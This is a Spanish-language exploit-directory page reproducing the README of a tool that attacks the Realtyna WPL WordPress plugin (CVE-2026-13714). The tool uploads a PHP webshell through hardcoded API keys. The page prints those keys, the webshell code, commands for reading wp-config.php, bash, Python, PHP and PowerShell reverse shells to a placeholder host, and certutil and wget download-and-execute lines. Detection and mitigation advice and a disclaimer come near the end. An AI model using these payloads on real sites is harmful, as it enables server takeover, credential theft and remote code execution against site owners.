Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-13714 — Exploit de RCE no autenticado para Realtyna WPL < 5.3.0 que sube un webshell PHP mediante una clave API hardcodeada y ejecuta comandos arbitrarios del sistema. | Kitploit
Herramientas/GitHubGitHub/katransefa/cve-2026-13714
ExplotaciónExplotación de Aplicaciones WebPost-ExplotaciónPruebas de PenetraciónDesarrollo de Payloads
GitHubkatransefa/cve-2026-13714

CVE-2026-13714

Exploit de RCE no autenticado para Realtyna WPL < 5.3.0 que sube un webshell PHP mediante una clave API hardcodeada y ejecuta comandos arbitrarios del sistema.

Ver Repositorio
hace 4 díasAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Realtyna WPL < 5.3.0 - Exploit de RCE no autenticado

Descripción

Este exploit apunta a una vulnerabilidad crítica en el plugin Realtyna Organic IDX + WPL Real Estate en versiones anteriores a la 5.3.0. El plugin utiliza credenciales codificadas y permite la carga de archivos no autenticada, lo que conduce a la ejecución remota de código (RCE).

Detalles de la vulnerabilidad

  • CVE ID: CVE-2026-13714
  • Versiones afectadas: < 5.3.0
  • Tipo: Carga arbitraria de archivos no autenticada que conduce a RCE
  • Investigador: Thom Stackhouse

Detalles técnicos

El plugin tiene una API de E/S habilitada por defecto con credenciales codificadas:

  • io_public_key = U7hdbv673YhdjplzzX7wU7hdbv673YhdjplzzX7w
  • io_private_key = Eft76bdh0o2uyhJkbG3T

La API no valida los tipos de archivo, lo que permite la carga arbitraria de archivos PHP.

Instalación

root@kitploit:~
# Clone or download the script
git clone https://github.com/yourusername/wpl-rce-exploit.git
cd wpl-rce-exploit

# Install dependencies
pip install requests urllib3

Uso

Uso básico

root@kitploit:~
# Upload webshell only
python exploit.py -u https://target.com/wordpress

# Execute a command
python exploit.py -u https://target.com/wordpress -c "whoami"

# Multiple commands
python exploit.py -u https://target.com/wordpress -c "id"  # Linux
python exploit.py -u https://target.com/wordpress -c "systeminfo"  # Windows

Comandos comunes

Objetivos Linux

root@kitploit:~
# System information
python exploit.py -u https://target.com -c "uname -a"

# Current user
python exploit.py -u https://target.com -c "whoami"

# List files
python exploit.py -u https://target.com -c "ls -la"

# Read wp-config.php
python exploit.py -u https://target.com -c "cat wp-config.php"

# Network information
python exploit.py -u https://target.com -c "ifconfig"
python exploit.py -u https://target.com -c "netstat -tulpn"

Objetivos Windows

root@kitploit:~
# System information
python exploit.py -u https://target.com -c "systeminfo"

# Current user
python exploit.py -u https://target.com -c "whoami"

# List files
python exploit.py -u https://target.com -c "dir"

# Read wp-config.php
python exploit.py -u https://target.com -c "type wp-config.php"

# Network information
python exploit.py -u https://target.com -c "ipconfig"
python exploit.py -u https://target.com -c "netstat -ano"

Uso avanzado

Reverse Shell (Linux)

root@kitploit:~
# Netcat reverse shell
python exploit.py -u https://target.com -c "bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'"

# Python reverse shell
python exploit.py -u https://target.com -c "python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"YOUR_IP\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/sh\",\"-i\"])'"

# PHP reverse shell
python exploit.py -u https://target.com -c "php -r '\$sock=fsockopen(\"YOUR_IP\",4444);exec(\"/bin/sh -i <&3 >&3 2>&3\");'"

Reverse Shell (Windows)

root@kitploit:~
# PowerShell reverse shell
python exploit.py -u https://target.com -c "powershell -c \"\$client = New-Object System.Net.Sockets.TCPClient('YOUR_IP',4444);\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){;\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2>&1 | Out-String );\$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> ';\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};\$client.Close()\""

Subir y ejecutar payloads personalizados

root@kitploit:~
# Download and execute (Windows)
python exploit.py -u https://target.com -c "certutil -urlcache -f http://YOUR_IP/payload.exe C:\temp\payload.exe && C:\temp\payload.exe"

# Download and execute (Linux)
python exploit.py -u https://target.com -c "wget http://YOUR_IP/payload -O /tmp/payload && chmod +x /tmp/payload && /tmp/payload"

Flujo del exploit

  1. Carga: Sube una webshell PHP (<?php system($_GET['c']); ?>)
  2. Ubicación: El archivo se guarda en wp-content/uploads/WPL/<ID>/shell.php
  3. Ejecución: Ejecuta comandos a través de shell.php?c=COMMAND

Detección

Cómo detectar el exploit

  • Busca archivos sospechosos en /wp-content/uploads/WPL/*/
  • Monitorea solicitudes con los parámetros: wplview=io, wplformat=io, cmd=set_property
  • Busca solicitudes API sospechosas con credenciales codificadas

Señales de compromiso

  • Archivos PHP inesperados en los directorios de carga
  • Solicitudes web inusuales con comandos del sistema
  • Nuevos usuarios administradores en WordPress
  • Archivos .htaccess modificados

Mitigación

Correcciones

  1. Actualiza inmediatamente a la versión 5.3.0 o superior de WPL Real Estate
  2. Si no puedes actualizar, desactiva la API de E/S:
    root@kitploit:~
    // Add to wp-config.php
    define('WPL_IO_STATUS', 0);
    
  3. Cambia las credenciales codificadas
  4. Implementa una validación adecuada de tipos de archivo
  5. Restringe los directorios de carga de archivos

Recomendaciones de seguridad

  • Mantén todos los plugins de WordPress actualizados
  • Usa un Firewall de Aplicaciones Web (WAF)
  • Realiza auditorías de seguridad periódicas
  • Monitorea los directorios de carga de archivos
  • Desactiva las API innecesarias

Capturas de pantalla

Exploit exitoso

root@kitploit:~
[+] Realtyna WPL < 5.3.0 RCE Exploit
[+] Target: https://localhost/wordpress/
[+] Command: whoami
[+] Uploading webshell...
[+] File uploaded successfully!
[+] Webshell found at: wp-content/uploads/WPL/1/shell.php
[+] Command output:
desktop-0s8mt1v\kg

Descargo de responsabilidad

Este exploit es solo para fines educativos y de pruebas autorizadas. El uso no autorizado contra sistemas que no posees o para los que no tienes permiso de prueba es ilegal. El autor no asume ninguna responsabilidad por el mal uso.

Uso legal

  • Úsalo solo en sistemas que poseas
  • Úsalo solo con permiso explícito por escrito
  • Sigue las prácticas de divulgación responsable
  • Reporta las vulnerabilidades a los proveedores

Licencia

Este proyecto es solo para fines educativos. Úsalo bajo tu propio riesgo.

Créditos

  • Investigador original: Thom Stackhouse
  • CVE: CVE-2026-13714
  • WPVDB ID: 69f9dcd8-ab3c-46ed-ac6b-2f1db35f8d1f

Referencias

  • Página de vulnerabilidad de WPScan
  • CVE-2026-13714

Registro de cambios

v1.0 (2026-08-17)

  • Lanzamiento inicial
  • Carga de archivos no autenticada
  • Ejecución remota de código
  • Soporte para ejecución de comandos

Contribuciones

No dudes en enviar issues y pull requests para mejoras.

Soporte

Para problemas y preguntas, abre un issue en GitHub.


⚠️ ADVERTENCIA: Esta herramienta se proporciona únicamente con fines de investigación en seguridad y educativos. Obtén siempre la autorización adecuada antes de probar cualquier sistema.

Descargar herramienta